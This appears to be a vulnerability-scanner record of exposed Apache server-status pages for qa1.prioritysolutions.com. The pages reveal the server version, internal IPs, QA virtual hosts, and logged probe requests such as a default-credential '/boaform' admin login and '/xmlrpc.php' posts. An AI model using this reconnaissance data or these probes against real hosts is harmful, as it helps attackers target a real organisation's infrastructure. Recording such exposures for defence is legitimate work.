0.00620791080.00.0020.55 10.253.106.184http/1.1 7-065330/0/276_ 0.00600351650.00.0018.56 10.253.106.191http/1.1 8-0822119/19/270K 0.012220852944.00.046.96 10.253.106.191http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/tabletlibs.min.2023.7.1.4 9-082220/0/337R 0.005770628900.00.0032.94 10.253.106.191http/1.1 10-082230/0/221R 0.005770265070.00.004.61 10.253.106.191http/1.1 11-082420/0/353R 0.005190594380.00.0016.21 10.253.106.184http/1.1 12-082430/0/400R 0.005180322310.00.0051.48 10.253.106.184http/1.1 13-082440/0/220R 0.005180315750.00.009.32 10.253.106.184http/1.1 14-0753011/11/301K 0.02254822368405.10.4031.46 10.253.106.191http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.html HTTP/1.1 15-070490/0/287R 0.0051201220780.00.0021.06 10.253.106.191http/1.1 16-0177538436/8456/8620K 5.19001628715437.415.4917.30 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 17-0824511/11/279K 0.0022342850231.40.0335.98 10.253.106.184http/1.1qa1.thermofisher.in:80GET /chemicals/en/layout/scientific/jcr:content/header-par.html 18-082460/0/278R 0.005170667830.00.004.21 10.253.106.191http/1.1 19-0276710/5/300_ 0.01600333250.00.0614.95 10.253.106.191http/1.1 20-055270/0/211R 0.002740181180.00.002.68 10.253.106.191http/1.1 21-075320/7/262_ 0.006218309950.00.044.40 10.253.106.184http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 22-0824710/10/244K 0.0121901483045.80.042.63 10.253.106.184http/1.1qa1.thermofisher.in:80GET /content/india-chemicals/en/error/404/jcr:content/content-p 23-082480/0/208R 0.005170186940.00.003.24 10.253.106.191http/1.1 24-055280/0/287R 0.00274080780.00.0013.59 10.253.106.191http/1.1 25-055290/0/317_ 0.002150292780.00.005.57 10.253.106.191http/1.1 26-055300/1/325_ 0.002150607060.00.0015.66 10.253.106.191http/1.1 27-0-0/0/215. 0.00510152560.00.001.38 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-09290/3/267_ 0.00600255680.00.018.04 10.253.106.184http/1.1 29-0230280/10/234_ 0.13580345900.00.4216.10 10.253.106.191http/1.1 30-0-0/0/300. 0.00530105960.00.0014.80 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-055320/1/280_ 0.0062155350120.00.0953.04 10.253.106.184http/1.1 32-0-0/0/297. 0.00580390100.00.0022.08 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-0-0/0/270. 0.00500341120.00.003.58 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-0-0/0/222. 0.00490128800.00.006.90 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-055370/0/220_ 0.002150200450.00.0049.26 10.253.106.191http/1.1 36-055380/0/212_ 0.002150137490.00.002.79 10.253.106.191http/1.1 37-075390/0/212R 0.005120137390.00.0014.21 10.253.106.184http/1.1 38-0254078151/8153/8286K 4.97402319414915.814.5724.68 10.253.106.184http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 39-0-0/0/294. 0.00480227510.00.0011.00 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-084570/0/281R 0.003620231310.00.0014.04 10.253.106.191http/1.1 41-084580/0/234R 0.003620325950.00.005.04 10.253.106.191http/1.1 42-084598/8/205W 0.00001884712.00.012.63 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 43-084690/0/203R 0.003550148130.00.003.61 10.253.106.191http/1.1 44-085960/0/200R 0.002520199600.00.0034.63 10.253.106.191http/1.1 45-085970/0/223_ 0.002510256210.00.0019.49 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-0-0/0/177. 0.0057081490.00.001.68 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-070590/0/304R 0.004990179800.00.0023.82 10.253.106.184http/1.1 48-016410/7/247R 0.015121292291480.00.035.21 10.253.106.184http/1.1 49-0-0/0/188. 0.00560169370.00.004.77 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-0-0/0/250. 0.00550252900.00.001.51 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 51-0-0/0/193. 0.00540170310.00.0015.12 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 52-070650/1/326R 0.00274421556510.00.007.54 10.253.106.191http/1.1 53-0-0/0/249. 0.0052079610.00.009.20 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 54-071080/1/339R 0.002740179560.00.0025.34 10.253.106.191http/1.1 55-085980/0/243_ 0.002510316570.00.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c21042881
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 07-Sep-2023 01:26:29 EDT Restart Time: Wednesday, 06-Sep-2023 21:14:08 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 4 hours 12 minutes 20 seconds Server load: 0.00 0.00 0.00 Total accesses: 4309 - Total Traffic: 17.5 MB - Total Duration: 66412 CPU Usage: u2.87 s2.05 cu3.2 cs1.22 - .0617% CPU load .285 requests/sec - 1215 B/second - 4269 B/request - 15.4124 ms/request 39 requests currently being processed, 30 idle workers KKRR__KR__KR_KR___RWKRRRR____R_RK_R__RR_____K_RR__R_KR_....__R__ .K.RKR....R.....RRKR............................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0307431514/1514/1514K 0.93809262743.92.682.68 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 1-0307441514/1514/1514K 0.85808772743.92.682.68 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 2-0131220/17/39R 0.153961910920.00.480.60 10.253.106.148http/1.1 3-0125140/0/19R 0.00138402880.00.000.08 10.253.106.135http/1.1 4-0147750/0/18_ 0.0022609190.00.000.41 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-0147760/0/13_ 0.0022503320.00.000.09 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 6-0671220/25/31K 0.3271551042966.70.950.96 10.253.106.135http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 7-0125170/0/7R 0.0012870840.00.000.00 10.253.106.135http/1.1 8-0147770/0/55_ 0.00225032790.00.001.07 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 9-0147780/0/7_ 0.002240670.00.000.02 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 10-0125181/1/31K 0.002266177019.10.020.06 10.253.106.135http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.html HTTP/1.1 11-0125190/3/10R 0.001210013610.00.010.02 10.253.106.135http/1.1 12-0147790/0/25_ 0.0022405100.00.000.46 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 13-0109713/12/20K 0.0271729226.40.080.09 10.253.106.135http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.html HTTP/1.1 14-0125200/0/13R 0.001285014280.00.000.05 10.253.106.135http/1.1 15-0147800/0/8_ 0.00224040.00.000.01 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 16-0147810/0/23_ 0.0022405070.00.000.20 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-0147820/0/20_ 0.0022303190.00.000.11 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-0125220/0/21R 0.00128504970.00.000.14 10.253.106.135http/1.1 19-0131247/18/34W 0.1600534710.90.450.63 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 20-050906/11/17K 0.037732774.80.080.08 10.253.106.135http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 21-0109750/12/24R 0.06875027050.00.120.16 10.253.106.148http/1.1 22-0109760/15/30R 0.02119122610.00.110.15 10.253.106.135http/1.1 23-084550/8/16R 0.00125302050.00.020.02 10.253.106.135http/1.1 24-0131250/0/7R 0.00673010.00.000.00 10.253.106.135http/1.1 25-0147830/0/32_ 0.0022305600.00.000.20 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-0147840/0/15_ 0.0022302220.00.000.07 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 27-0147850/0/18_ 0.002230770.00.000.06 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-0147860/0/18_ 0.0022303290.00.000.41 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-0131260/8/45R 0.02560206810.00.080.38 10.253.106.148http/1.1 30-0147870/0/19_ 0.0022304020.00.000.14 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0125250/0/22R 0.001283039360.00.000.11 10.253.106.135http/1.1 32-050935/13/14K 0.17714388101.50.520.52 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 33-0147880/0/14_ 0.0022301010.00.000.12 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-085010/17/23R 0.01145773390.00.040.05 10.253.106.148http/1.1 35-0147890/0/22_ 0.002230890.00.000.03 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0147900/0/7_ 0.00217020.00.000.01 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-0116910/0/7R 0.0012100430.00.000.01 10.253.106.148http/1.1 38-0131270/15/26R 0.355601265150.00.880.92 10.253.106.148http/1.1 39-0147910/0/12_ 0.00216080.00.000.03 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-0147920/0/3_ 0.00216000.00.000.00 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0148030/0/12_ 0.00201022210.00.000.21 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-0148040/0/8_ 0.002000810.00.000.01 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0148050/0/30_ 0.0020005900.00.000.63 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-01313011/11/22K 0.032170312983.80.080.13 10.253.106.148http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.2022.6.17 45-0149020/0/10_ 0.00701910.00.000.01 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-0131310/0/19R 0.0039207810.00.000.07 10.253.106.148http/1.1 47-0131320/0/19R 0.0039201880.00.000.13 10.253.106.148http/1.1 48-0131330/0/21_ 0.00392055990.00.000.46 10.253.106.148http/1.1 49-0149050/0/11_ 0.0060640.00.000.02 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-0131340/0/8R 0.0039201370.00.000.02 10.253.106.148http/1.1 51-0149060/0/18_ 0.00603220.00.000.02 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 52-0117032/3/23K 0.02202125358.40.090.17 10.253.106.135http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/tabletlibs.min.2023.7.1.4 53-071710/15/20R 0.0211804310220.00.060.11 10.253.106.135http/1.1 54-0<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879ca96a9a8f
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 03-Sep-2023 13:35:49 EDT Restart Time: Friday, 01-Sep-2023 17:23:28 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 20 hours 12 minutes 21 seconds Server load: 0.00 0.00 0.00 Total accesses: 46786 - Total Traffic: 564.5 MB - Total Duration: 1282288 CPU Usage: u12.02 s22.03 cu56.72 cs14.67 - .0663% CPU load .294 requests/sec - 3719 B/second - 12.4 kB/request - 27.4075 ms/request 23 requests currently being processed, 30 idle workers __KK_RRR___R_RR_R__._.._R._KRRK.W.RR_....R.___...._RRR___R_.R___ ___.__.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0183320/0/261_ 0.0010292220.00.004.66 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 1-0183330/0/214_ 0.0000203430.00.0011.68 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 2-02218215914/15914/15914K 9.7380975829007.328.3328.33 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 3-02218315914/15914/15914K 9.0580929229007.628.3328.33 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0160850/0/181_ 0.00453097520.00.002.23 10.253.106.135http/1.1 5-098520/0/246R 0.005940133750.00.003.90 10.253.106.148http/1.1 6-098530/11/178R 0.014780120670.00.052.80 10.253.106.148http/1.1 7-0160860/0/196R 0.004530174170.00.002.66 10.253.106.148http/1.1 8-0142270/15/215_ 0.164530106030.00.484.28 10.253.106.148http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/common.min.2023.7.1.428.j 9-0174950/0/293_ 0.003320233530.00.0015.79 10.253.106.135http/1.1 10-0142280/10/130_ 0.012121160280.00.052.24 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /index.html HTTP/1.1 11-0171020/2/135R 0.005941452250.00.000.83 10.253.106.148http/1.1 12-0171030/0/198_ 0.00390103440.00.007.33 10.253.106.148http/1.1 13-0171080/8/178R 0.0164539114120.00.035.19 10.253.106.148http/1.1 14-0171090/0/213R 0.006460346420.00.005.54 10.253.106.148http/1.1 15-0142300/10/298_ 0.0133512323450.00.0220.64 10.253.106.135http/1.1 16-0117510/2/195R 0.00492103386680.00.013.28 10.253.106.148http/1.1 17-0160870/0/194_ 0.00340064400.00.001.68 10.253.106.135http/1.1 18-0183340/0/186_ 0.000060980.00.003.98 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-0-0/0/164. 0.006440102130.00.002.26 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 20-0174970/1/149_ 0.00183964310.00.006.03 10.253.106.148http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 21-0-0/0/186. 0.005920128690.00.002.52 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 22-0-0/0/324. 0.00360202710.00.0021.10 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0171130/0/235_ 0.00340193520.00.003.24 10.253.106.148http/1.1 24-0171140/0/131R 0.00646082580.00.001.04 10.253.106.148http/1.1 25-0-0/0/197. 0.00591079350.00.002.87 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-0171150/1/225_ 0.0025016107070.00.003.00 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.1 27-0171161/1/188K 0.001051246161.00.003.04 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /?1693761089 HTTP/1.1 28-0171170/0/173R 0.006460148290.00.006.42 10.253.106.135http/1.1 29-0142320/3/224R 0.004830150420.00.015.74 10.253.106.148http/1.1 30-0171181/1/286K 0.001010425740.80.004.80 10.253.106.135http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 31-0-0/0/162. 0.00147091160.00.000.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-088119/11/306W 0.01005015213.60.0234.46 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 33-0-0/0/311. 0.00370205030.00.003.73 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-0145270/14/175R 0.01594957440.00.024.98 10.253.106.135http/1.1 35-011230/8/172R 0.255940150770.00.5215.21 10.253.106.135http/1.1 36-0146620/9/139_ 0.014133120150.00.031.77 10.253.106.135http/1.1qa.bindingsite.com:80POST /xmlrpc.php HTTP/1.1 37-0-0/0/167. 0.001460100480.00.001.38 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 38-0-0/0/183. 0.001070169690.00.003.36 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 39-0-0/0/191. 0.001450179050.00.009.95 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-0-0/0/290. 0.005900128460.00.0019.97 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0146680/0/217R 0.004780131160.00.003.16 10.253.106.148http/1.1 42-0-0/0/319. 0.005890470650.00.0013.38 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0175370/0/213_ 0.002130126920.00.007.95 10.253.106.135http/1.1 44-0175380/0/255_ 0.002120159380.00.0019.11 10.253.106.135http/1.1 45-0175390/0/194_ 0.001830211110.00.0014.75 10.253.106.148http/1.1 46-0-0/0/231. 0.004760307780.00.0022.67 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0-0/0/171. 0.004770129520.00.002.22 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-0-0/0/134. 0.004750169150.00.001.18 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 49-0-0/0/210. 0.004720248500.00.0013.09 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-0176710/0/162_ 0.00148085390.00.001.19 10.253.106.148http/1.1 51-0146760/7/114R 0.004780101340.00.010.96 10.253.106.148http/1.1 52-0146770/12/175R 0.014780169380.00.033.11 10.253.106.148http/1.1 53-0146780/0/153R 0.004780149410.00.003.78 10.253.106.148http/1.1 54-056440/51/211_ 0.54453086780.01.002.69 10.253.106.135http/1.1qa1.thermofisher.in:80GET /etc/desi
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c2f4e8de6
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 31-Aug-2023 08:12:51 EDT Restart Time: Wednesday, 30-Aug-2023 20:12:06 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 12 hours 45 seconds Server load: 0.01 0.03 0.00 Total accesses: 13329 - Total Traffic: 216.5 MB - Total Duration: 616576 CPU Usage: u4.7 s5.9 cu21.77 cs4.32 - .0848% CPU load .308 requests/sec - 5.1 kB/second - 16.6 kB/request - 46.2582 ms/request 28 requests currently being processed, 30 idle workers _R__R_K___RK__RRRRKR_RR..KRR...RR._..RWRR._..R_.RR_RK_._.___._._ __R._....______................................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-080900/0/74_ 0.007053040.00.0012.05 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 1-0290150/17/66R 0.484510175450.00.842.17 10.253.106.148http/1.1 2-080910/0/60_ 0.004011740.00.000.37 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 3-080920/0/71_ 0.0030179940.00.001.92 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 4-069010/6/50R 0.05606025200.00.130.63 10.253.106.135http/1.1 5-0324230/8/98_ 0.2769132137810.00.733.34 10.253.106.148http/1.1 6-0322684325/4325/4325K 2.650026557869.27.687.68 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 7-036740/2/40_ 0.004403520.00.010.15 10.253.106.135http/1.1 8-080930/0/76_ 0.003044260.00.001.30 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 9-080940/0/94_ 0.002089120.00.002.86 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 10-073080/0/59R 0.0040308440.00.000.33 10.253.106.148http/1.1 11-0322734325/4325/4325K 2.470025247869.27.687.68 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 12-080950/0/52_ 0.002021200.00.000.68 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 13-080960/0/73_ 0.002038320.00.002.38 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 14-069030/0/59R 0.00628083240.00.001.44 10.253.106.148http/1.1 15-073100/0/78R 0.00403078480.00.002.64 10.253.106.148http/1.1 16-070910/1/89R 0.006271073930.00.017.05 10.253.106.135http/1.1 17-070920/0/78R 0.00627084990.00.003.15 10.253.106.135http/1.1 18-070932/2/55K 0.007627290619.50.022.18 10.253.106.135http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 19-070940/2/69R 0.006270113350.00.012.33 10.253.106.135http/1.1 20-080970/0/89_ 0.0020260960.00.003.79 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-070960/1/82R 0.00627731470.00.002.86 10.253.106.148http/1.1 22-070970/0/49R 0.00627028090.00.000.89 10.253.106.135http/1.1 23-0-0/0/47. 0.00892053710.00.001.09 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0-0/0/94. 0.008850128800.00.001.76 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-057321/3/50K 0.0066011471.80.022.67 10.253.106.135http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/favicon.ico HTTP/1.1 26-0311340/5/90R 0.01628046310.00.024.64 10.253.106.148http/1.1 27-057330/4/61R 0.056026638260.04.515.67 10.253.106.148http/1.1 28-0-0/0/29. 0.0089101570.00.000.01 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-0-0/0/87. 0.00890058880.00.003.19 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 30-0-0/0/35. 0.0088905560.00.000.07 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0311350/15/73R 0.166285420540.00.471.56 10.253.106.135http/1.1 32-0296340/19/42R 0.02408199156870.01.101.96 10.253.106.148http/1.1 33-0-0/0/47. 0.00888015390.00.001.00 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-043670/3/59_ 0.0187424170380.00.040.70 10.253.106.135http/1.1 35-0-0/0/54. 0.008870195450.00.000.55 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0-0/0/52. 0.008860151370.00.001.11 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-073110/8/65R 0.003492827570.00.010.90 10.253.106.148http/1.1 38-057409/11/62W 0.0100518513.60.030.74 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 39-057410/3/44R 0.0040810135610.00.000.71 10.253.106.148http/1.1 40-0311360/26/119R 0.283496162250.01.228.10 10.253.106.148http/1.1 41-0-0/0/70. 0.00860146820.00.003.62 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-029100/0/89_ 0.001300322830.00.006.05 10.253.106.135http/1.1 43-0-0/0/55. 0.00579031610.00.000.68 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0-0/0/53. 0.00320019630.00.006.28 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-073130/0/95R 0.00323095040.00.001.59 10.253.106.148http/1.1 46-073140/0/39_ 0.0032303920.00.000.03 10.253.106.135http/1.1 47-0-0/0/106. 0.003190223020.00.005.64 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-073150/0/49R 0.00323019450.00.000.53 10.253.106.148http/1.1 49-057430/2/55R 0.004031976420.00.000.38 10.253.106.148http/1.1 50-0326020/7/45_ 0.001302853140.00.972.50 10.253.106.135http/1.1 51-057440/0/132R 0.005800317710.00.0022.59 10.253.106.148http/1.1 52-0311411/4/47K 0.00762977340.80.010.61 10.253.106.135http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 53-073160/0/52_ 0.00323049210.00.002.86 10.253.106.135http/1.1 54-0-0/0/72. 0.00191022430.00.001.66 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 55-0311420/11/58_ 0.02193011630.00.911.16 10.253.106.148http/1.1</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c48463c5b
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Tuesday, 29-Aug-2023 20:31:19 EDT Restart Time: Tuesday, 29-Aug-2023 13:09:37 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 hours 21 minutes 41 seconds Server load: 0.16 0.07 0.01 Total accesses: 12661 - Total Traffic: 164.8 MB - Total Duration: 692713 CPU Usage: u4.08 s4.59 cu12.74 cs4.56 - .098% CPU load .478 requests/sec - 6.4 kB/second - 13.3 kB/request - 54.7123 ms/request 39 requests currently being processed, 34 idle workers KKR_RRR_RKKRR_RRR__R__K___RKR_R___RR_RWRR__R_RKRRR_____RR____..R ._._._K...._.......RR.R_.._......._............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-053062650/2650/2650K 1.538015674806.44.694.69 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 1-053072650/2650/2650K 1.638016564806.34.694.69 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 2-013640/11/105R 0.00186153160.00.031.44 10.253.106.135http/1.1 3-028110/0/128_ 0.0073062660.00.002.11 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 4-0238710/54/81R 0.072123473890.00.151.71 10.253.106.135http/1.1 5-013660/1/107R 0.007050319080.00.005.44 10.253.106.148http/1.1 6-016800/1/121R 0.001850147970.00.001.62 10.253.106.148http/1.1 7-028120/0/125_ 0.0072077250.00.002.39 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-0300240/35/75R 0.022121470640.00.052.05 10.253.106.135http/1.1 9-0136710/20/152K 0.037129027941.90.933.63 10.253.106.135http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 10-0320666/14/62K 0.0126813612210.00.020.21 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /_all_dbs HTTP/1.1 11-023740/0/87R 0.00515043910.00.001.30 10.253.106.148http/1.1 12-023750/0/84R 0.00514069260.00.000.60 10.253.106.148http/1.1 13-028130/0/152_ 0.0072092460.00.001.79 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 14-023770/0/100R 0.00514052470.00.001.24 10.253.106.135http/1.1 15-023780/0/82R 0.00514079430.00.001.64 10.253.106.135http/1.1 16-023790/0/123R 0.005130180010.00.0017.69 10.253.106.135http/1.1 17-0316070/32/71_ 0.03170101870.00.051.48 